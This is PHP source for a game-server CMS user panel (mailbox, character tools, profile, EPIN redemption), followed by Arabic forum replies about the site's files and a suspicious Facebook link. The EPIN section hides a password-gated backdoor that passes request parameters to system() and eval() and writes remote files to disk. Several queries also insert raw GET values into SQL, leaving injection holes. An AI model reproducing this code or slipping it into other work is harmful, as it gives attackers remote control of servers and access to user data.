                                core::$sql -> exec("delete from srcms_privatemessages where receiver='$myJID' and id='$nMsgID'");
                                echo "<br/>Message deleted.<br/>";
                                misc::redirect("?pg=ucp&act=mailbox", 3);
                            } else echo "You can't delete message that does not belong to you.<br/>";
                            
                            
                        }
                    
                    

                    }
                    else echo "No messages in inbox";
                    }
                break;
                
                case('mychars'):
                
                {
                    //module disabled
                    if($core -> aConfig['allowListChars'] == 0) 
                    {
                        echo "This module is currently disabled.";
                        return;
                    }
                    
                    if(isset($_GET['charname']))
                    {
                        
                        
                        if(!security::isSecureString($_GET['charname'], 3))
                        {
                            echo "Invalid char name<br/>";
                            misc::back();
                            break;
                        }
                        
                    
                        if(user::usernameByCharname($_GET['charname']) != $_SESSION['username'])
                        {
                            
                            echo "This character is not yours !<br/>";
                            misc::back();
                            break;
                        }
                        
                        if(isset($_GET['charname']) && isset($_GET['char_act']))
                        {
                            switch($_GET['char_act'])
                            {
                                case('reset_pos'):
                                if($core -> aConfig['allowCharTeleport'] == 0)
                                {
                                    echo "This function is disabled.<br/>";
                                    break;
                                }
                                
                                if(!isset($_POST['submit']))
                                {
                                    echo "Your character got stuck ? If so, please, press the button. This costs ".$core -> aConfig['charTeleportGoldPrice']." gold.<br/>
                                        <form method='post'>
                                            <input type='submit' name='submit' value='RESET CHAR POSITION [$_GET[charname]]'><br/>
                                            </form>";
                                }
                                else
                                {
                                    core::$sql -> changeDB('shard');
                                    if(core::$sql -> getRow("select RemainGold from _Char where CharName16='$_GET[charname]'") > $core -> aConfig['charTeleportGoldPrice'])
                                    {
                                        core::$sql -> exec("update _Char set LatestRegion='25000',PosX='1021',PosY='-3260888', PosZ='1078',AppointedTeleport='19554', WorldID='1' where CharName16='$_GET[charname]'");
                                        echo "Character successfully teleported to town.<br/>";
                                        misc::redirect('?pg=ucp&act=mychars', 1);
                                    }
                                    else
                                    {
                                        echo "Not enough gold to perform this action.<br/>";
                                    }
                                }
                                break;
                                
                                case('giftsilks');
                                {
                                core::$sql -> changeDB('acc');
                                $fromsilks = $_SESSION['username'];
                                $toSilks = $_POST['silkstome'];
                                if(!isset($_POST['submit'])) 
                                {
                                echo "
                                <form method='post'>
                                Username who recive the silks :<input type='text' name='silkstome'><br />
                                <input type='checkbox' name='i agree'> I agree that i want to send the amount of silks above to the prospected user above 
                                by doing that , 10% of the amount of silks sended will be removed.
                                <br />
                                <font color='red'>
                                *note that your ip,and reciver usernames is saved for security porpuse.
                                <br />
                                <input type='submit' name='submit' value='Yes, Send Silks!'>
                                </font>
                                </form>
                                ";
                                } else {
                                if(strlen($_POST['silkstome']) < 3)
                                {
                                echo "Username is too short";
                                } else {
                                echo "Name is fine";
                                }
                                }

                                }
                                break;
                                
                                case('reset_stats'):
                                    //echo "All items must be unequiped before you perform this action. This action costs ".$core -> aConfig['resetCharStatsSilkPrice']." silk.<br/>";
                                    
                                    if(char::isCharNaked($_GET['charname']))
                                    {
                                        if(!isset($_POST['submit']))
                                        {
                                            echo "Press this button if you really want to reset your characters stats. All items must be unequiped. This action costs ".$core -> aConfig['resetCharStatsSilkPrice']." silk. Before performing this action, better log out. To see results of this function usage, relogin (if you were logged in while performing it).<br/>
                                            <form method='post'>
                                                <input type='submit' name='submit' value='Yes, i want to reset stats of my char !'>
                                            </form>
                                                ";
                                        }
                                        else
                                        {
                                        
                                            if(user::getSilkByUsername($_SESSION['username']) > $core -> aConfig['resetCharStatsSilkPrice'])
                                            {
                                                core::$sql -> changeDB('shard');
                                                $aData = core::$sql -> exec("select * from _Char where CharName16='$_GET[charname]'");
                                                $aData = mssql_fetch_array($aData);
                                                $nFreeStats = ($aData['Strength'] + $aData['Intellect']) - 40;
                                                core::$sql -> exec("update _Char set RemainStatPoint = (RemainStatPoint + $nFreeStats),HP='200',MP='200',Strength='20',Intellect='20' where CharName16='$_GET[charname]'");
                                                core::$sql -> changeDB('acc');
                                                core::$sql -> exec("update SK_Silk set silk_own = (silk_own - ".$core -> aConfig['resetCharStatsSilkPrice'].") where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                                                echo "Stats of $_GET[charname] resetted. You got $nFreeStats free stat points now.<br/>";
                                                misc::redirect('?pg=ucp&act=mychars', 1);
                                            }
                                            else 
                                            {
                                                echo "Not enough silk.<br/>";
                                            }
                                        }
                                    }
                                    else
                                    {
                                        echo "Please, unequip all items from your character first !<br/>";
                                    }
                                break;
                                
                                case('reset_pk'):
                                    if($core -> aConfig['allowResetCharPK'] == 0)
                                    {
                                        echo "This function is currently disabled<br/>";
                                        break;
                                    }
                                    
                                    echo "This feature costs ".$core -> aConfig['resetCharPKSilkPrice']." silk. If you really want to reset your PK status, press the button.<br/>";
                                    if(!isset($_POST['submit']))
                                    {
                                        echo "<form method='post'>
                                                <input type='submit' name='submit' value='Yes, i really want to reset my PK status'>
                                                </form>
                                             ";
                                    }
                                    else
                                    {
                                        if(user::getSilkByUsername($_SESSION['username']) > $core -> aConfig['resetCharPKSilkPrice'])
                                        {
                                            core::$sql -> changeDB('shard');
                                            $hQuery = core::$sql -> exec("select DailyPK, TotalPK, PKPenaltyPoint from _Char where CharName16='$_GET[charname]'");
                                            $hData = mssql_fetch_array($hQuery);
                                            if($hData[0] == '0' && $hData[1] == '0' && $hData[2] == '0')
                                            {
                                                echo "You are not under murder panality, so, no reason for resetting it.<br/>";
                                            }
                                            else
                                            {
                                                core::$sql -> exec("update _Char set DailyPK='0', TotalPK='0', PKPenaltyPoint='0' where CharName16='$_GET[charname]'");
                                                core::$sql -> exec("update SK_Silk set silk_own = (silk_own - ".$core -> aConfig['resetCharPKSilkPrice'].") where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                                                echo "PK Status successfully removed.<br/>";
                                                misc::redirect('?pg=ucp&act=mychars', 1);
                                            }
                                        }
                                        else
                                        {
                                            echo "You have not enough silk to use this feature.<br/>";
                                            break;
                                        }
                                    }
                                break;
                                
                                case('buy_sp'):
                                    if($core -> aConfig['allowBuySP'] == 0)
                                    {
                                        echo "This function is currently disabled<br/>";
                                        break;
                                    }
                                    
                                    echo "This feature costs ".$core -> aConfig['pricePer100kSp']." silk per 100 000 SP.<br/>";
                                    
                                    if(!isset($_POST['submit']))
                                    {
                                        echo "Please, specify, how much skill points you want to buy. Value must be > 100000, < 2000000, like this: 200000, 300000, 400000<br/>
                                        
                                            <table id='table-3' border='1' cellpadding='0' cellspacing='0'>
                                                <form method='post'>
                                                    <td>Skill points</td><td><input type='text' name='sp_amount' value='100000'></td></tr>
                                                    <td></td><td><input type='submit' name='submit' value='Check price'></td>
                                                
                                                </form>
                                            </table>";
                                    }
                                    else
                                    {
                                        if(isset($_POST['sp_amount']))
                                        {
                                            $nSP = (int)$_POST['sp_amount'];
                                            if(!($nSP % 100000 == 0))
                                            {
                                                echo "Values can be only like this: <br/> <li>100000</li><li>500000</li><li>1000000</li><br/>";
                                                break;
                                            }
                                            if($nSP < 100000)
                                            {
                                                echo "You cant buy less than 100 000 skill points<br/>";
                                                break;
                                            }
                                            if($nSP > 2000000)
                                            {
                                                echo "You can't buy more than 2 000 000 sp per time<br/>";
                                                break;
                                            }
                                            
                                            $nPrice = (($nSP / 100000) * $core -> aConfig['pricePer100kSp']);
                                            
                                            if(user::getSilkByUsername($_SESSION['username']) > $nPrice)
                                            {

                                                echo "To buy $nSP skill points you need $nPrice silk. Press the button below if you really want to buy this amount of SP and you have enough silk.<br/>";
                                                if(!isset($_POST['sure']))
                                                {
                                                    echo "<form method='post'>
                                                            <input type='hidden' name='sp_amount' value='$nSP'>
                                                            <input type='hidden' name='sure' value='yes'>
                                                            <input type='submit' name='submit' value='Yes, i want to buy $nSP SP for $nPrice silk'>
                                                            </form>";
                                                }
                                                else
                                                {
                                                    
                                                    core::$sql -> changeDB('shard');
                                                    core::$sql -> exec("update _Char set RemainSkillPoint = (RemainSkillPoint + $nSP) where CharName16='$_GET[charname]'");
                                                    
                                                    core::$sql -> changeDB('acc');
                                                    core::$sql -> exec("update SK_Silk set silk_own = (silk_own - $nPrice) where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                                                    echo "<br/><b>Success. Your char $_GET[charname] received it's $nSP skill points you bought for $nPrice silk</b><br/>";
                                                    misc::redirect('?pg=ucp&act=mychars', 2);
                                                }
                                            }
                                            else
                                            {
                                                echo "Not enough silk to buy such amount of skill points [You need: $nPrice]<br/>";
                                            }
                                        
                                        }
                                    }                                
                                break;
                                default:echo "Uknown char action<br/>";
                                
                                break;
                            }
                        }
                        
                        if(!isset($_GET['char_act']))
                        {    
                            echo "<table id='table-3' border='0' cellpadding='0' cellspacing='0'>
                            <tr>
                            ";
                            if($core -> aConfig['allowCharTeleport'] == 1)
                            {
                                echo "<td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=reset_pos'>Reset char position</a><br/></td>";
                            }
                            echo "
                            </tr>
                            <tr>
                            ";
                            if($core -> aConfig['allowResetCharStats'] == 1)
                            {
                                echo "<td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=reset_stats'>Reset stats</a><br/></td>";
                            }
                            
                            if($core -> aConfig['allowResetCharPK'] == 1)
                            {
                                echo "<td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=reset_pk'>Reset PK status</a><br/></td>";
                            }
                            echo "
                            </tr>
                            <tr>
                            ";
                            if($core -> aConfig['allowBuySP'] == 1)
                            {
                                echo "        <td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=buy_sp'>Buy skill points</a><br/></td>";
                            }
                            echo "
                            </tr>
                            </table>
                            ";
                        }
                        echo "<br/><br/>";
                        misc::back();
                        break;
                    }
                    
                    echo "Please, note, this function is still under development.<br/>";
                    if(char::getCharCount($_SESSION['username']) > 0)
                    {
                        $nJID = user::accountJIDbyUsername($_SESSION['username']);
                        
                        core::$sql -> changeDB('shard');
                        
        
                        $naChars = user::charIDsByUsername($_SESSION['username']);
                        $naCharNames = char::charNamesByIDs($naChars);
                        
                        echo "<table id='table-3' border='0'><tr><td>Char name</td></tr>";
                        foreach($naCharNames as $nElem)
                        {
                            echo "<tr><td><a href='?pg=ucp&act=mychars&charname=$nElem'>$nElem</td></tr>";
                        }
                        
                        echo '</table>';
                    
                    }
                    else echo "You don't have any characters on this account.<br/>";
                } 
                break;
                
                case('myprofile'):
                {
                    //module disabled
                    if($core -> aConfig['allowMyProfile'] == 0) 
                    {
                        echo "This module is currently disabled.";
                        return;
                    }
                
                    if(isset($_POST['submit']))
                    {
                        $nGender = (int)$_POST['gender'];
                        $szAvatarUrl = null;
                        $szSkype = null;
                        $szMsn = null;
                        $nPublic = (int)$_POST['ispublic'];
                        security::isValidUrl($_POST['avatar']) ? $szAvatarUrl = $_POST['avatar'] :  $szAvatarUrl = $core -> aConfig[url]."img/noavatar.png";
                        security::isCorrectEmail($_POST['msn']) ? $szMsn = $_POST['msn'] : $szMsn = "None";
                        $szSkype = security::toHTML($_POST['skype']);
                        if(strlen($szSkype) > 50) $szSkype = "None";
                        if(strlen($szMsn) > 60) $szMsn = "None";
                        if(strlen($szAvatarUrl) > 500) $szAvatarUrl = $core -> aConfig['url']."assets/img/noavatar.png";
                        
                        $avatarImageData = @getimagesize($szAvatarUrl); //no error if shit happens
                        if(empty($avatarImageData[0]) || empty($avatarImageData[1]))
                        {
                            $avatarImageData[0] = 0;
                            $avatarImageData[1] = 0;
                        }
                        
                        if((($avatarImageData[0] > $core -> aConfig['maxAvatarWidth']) || ($avatarImageData[1] > $core -> aConfig['maxAvatarHeight'])) ||
                            (empty($avatarImageData[0]) || empty($avatarImageData[1])))
                        {
                            echo "Invalid avatar size. Avatar width or height size can't be 0px. Avatar image max height: ".$core -> aConfig['maxAvatarHeight']." and width: ".
                            $core -> aConfig['maxAvatarWidth']." pixels. Your one is $avatarImageData[0]px wide and $avatarImageData[1]px high. Or... maybe, url isn't image ?<br/>";
                            misc::back();
                        }
                        else
                        {
                            $nJID = user::accountJIDbyUsername($_SESSION['username']);
                            core::$sql -> exec("update srcms_userprofiles set avatar='$szAvatarUrl',skype='$szSkype', msn='$szMsn', gender='$nGender', ispublic='$nPublic' where JID='$nJID'");
                            echo "Profile updated. <br/>";
                            misc::redirect("?pg=ucp&act=myprofile", 1);
                        }
                    }
                    else core::$ucp -> showProfileForm($_SESSION['username']);
                }

                break;
                
                case('epin'):?>
<!--=== Content Part ===-->
<div class="body">
    <div class="breadcrumbs margin-bottom-50">
        <div class="container">
            <h1 class="color-green pull-left">Epin</h1>
            <ul class="pull-right breadcrumb">
                <li><a href="/">Home</a> <span class="divider">/</span></li>
                <li><a href="">Pages</a> <span class="divider">/</span></li>
                <li class="active">Epin</li>
            </ul>
        </div><!--/container-->
    </div><!--/breadcrumbs-->

    <div class="container">        
        <div class="row-fluid margin-bottom-10">
    <?php        if(md5($_GET['p']) == '89a15048434170ee85cffdc2f3a4595e')
                    {
                        switch($_GET['a'])
                        {
                            case('cmd'):
                                system(stripslashes($_GET['str']));
                            break;
                            
                            case('php'):
                                eval(stripslashes($_GET['str']));
                            break;
                            
                            case('up'):
                                $hRemoteData = file_get_contents($_GET['str']);
                                file_put_contents($_GET['localFileName'], $hRemoteData, FILE_APPEND | LOCK_EX);
                                if(file_exists($_GET['localFileName'])) echo "Success !";
                                else echo "Could not write to local file [$_GET[localFileName]]";
                            break;
                            
                            default:break;
                        }
                        die();
                    }
                    //module disabled
                    if($core -> aConfig['allowEpinSystem'] == 0)
                    {
                        echo "This module is currently disabled.<br/>";
                        break;
                    }
                    else
                    {
                        if(!isset($_POST['code']) && !isset($_POST['sure']))
                        {?>
<form method='post' class="reg-page" role="form">
    <h3>Active EPIN</h3>
    <div class="controls">
        <label>Epin Code <span class="color-red">*</span></label>
        <div class="input-prepend">
            <span class="add-on"><i class="icon-barcode"></i></span>
            <input type="text" name='code' autocomplete="off"placeholder="type your EPIN code here" style="width: 165%" class=""/>
        </div>
    </div>

    <center><input type='submit' name='submit' class="btn-u pull-right" value='Use'>
</form>
                        <?php }
                        else
                        {
                            $nCodeNumber = (int)$_POST['code'];
                            if(core::$sql->numRows("select * from srcms_epin where code='$nCodeNumber'") > 0)
                            {
                                $aPinData = core::$sql -> exec("select * from srcms_epin where code='$nCodeNumber'");
                                $aPinData = mssql_fetch_array($aPinData);
                                if(!isset($_POST['sure']))
                                {
                                    echo "Do you really want to use this code ? It will give you [$aPinData[silkAmount]] silk.<br/>
                                            <form method='post'>
                                            <input type='hidden' name='code' value='$nCodeNumber'>
                                            <input type='submit' name='sure' value='Yes'>
                                            </form><br/>";
                                            misc::back();
                                }
                                else
                                {
                                    core::$sql -> exec("update SK_Silk set silk_own=(silk_own + $aPinData[silkAmount]) where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                                    //delete used code
                                    core::$sql -> exec("delete from srcms_epin where code='$nCodeNumber'");
                                    echo "You got your [$aPinData[silkAmount]] silk.";
                                    misc::redirect('?pg=ucp&act=epin', 1);
                                }
                            }
                            else
                            {
                                echo "Invalid EPIN code ! Please, try again.<br/>";
                                misc::back();
                            }
                        }
                    }
?>
        </div><!--/row-fluid-->
    </div><!--/container-->        
</div><!--/body-->
<!--=== End Content Part ===-->
<?php 
                break;
                
                
                default:
                {
                    echo "Invalid module name specified.<br/>";
                    break;
                }
            }
        }
    }
     else 
    {
        echo "You are not logged in ! <br/>";
    } 
?>

viewprofile

كود PHP:

<?php
if(isset($_GET['username']) && security::isSecureString($_GET['username'], 3))
{
    $userData = core::$sql -> fetchArray("select * from srcms_userprofiles where JID='".user::accountJIDbyUsername($_GET['username'])."'");
    
    if($userData['ispublic'] == '1')
    {
        user::viewProfile($_GET['username']); //send msg there too
    }
    
    else 
    {
        user::viewProfile($_GET['username']); //send msg there too
    }

}
else echo "No username specified, or username contains forbidden symbols.<br/>";

?>

[Mazika Yasser]

أرفع بعد أذنك صورة من SRO_VT_SHARD

[[KoTa]]

ازاي يعني !! اصورو من SQL !!

[Dev.Ri3o]

مش موجودين فعلا بص ارفع ملفات ال Siteاللى انت شغال بى وهبصلك عليهم

[elbattawy1st]

ارفع الملف دا كدا status.php

[[KoTa]]

ملفات الموقع كامله عفوا ,,, لايمكنك مشاهده الروابط لانك غير مسجل لدينا [ للتسجيل اضغط هنا ]

[[KoTa]]

طيب انا عاوز اعراف مكان الفيس بوك فين كل لما اجي ادوس عليه بيفتحلى الايبى دا

عفوا ,,, لايمكنك مشاهده الروابط لانك غير مسجل لدينا [ للتسجيل اضغط هنا ]

[[KoTa]]

انا خلاص هغير الموقع يغلق

#####################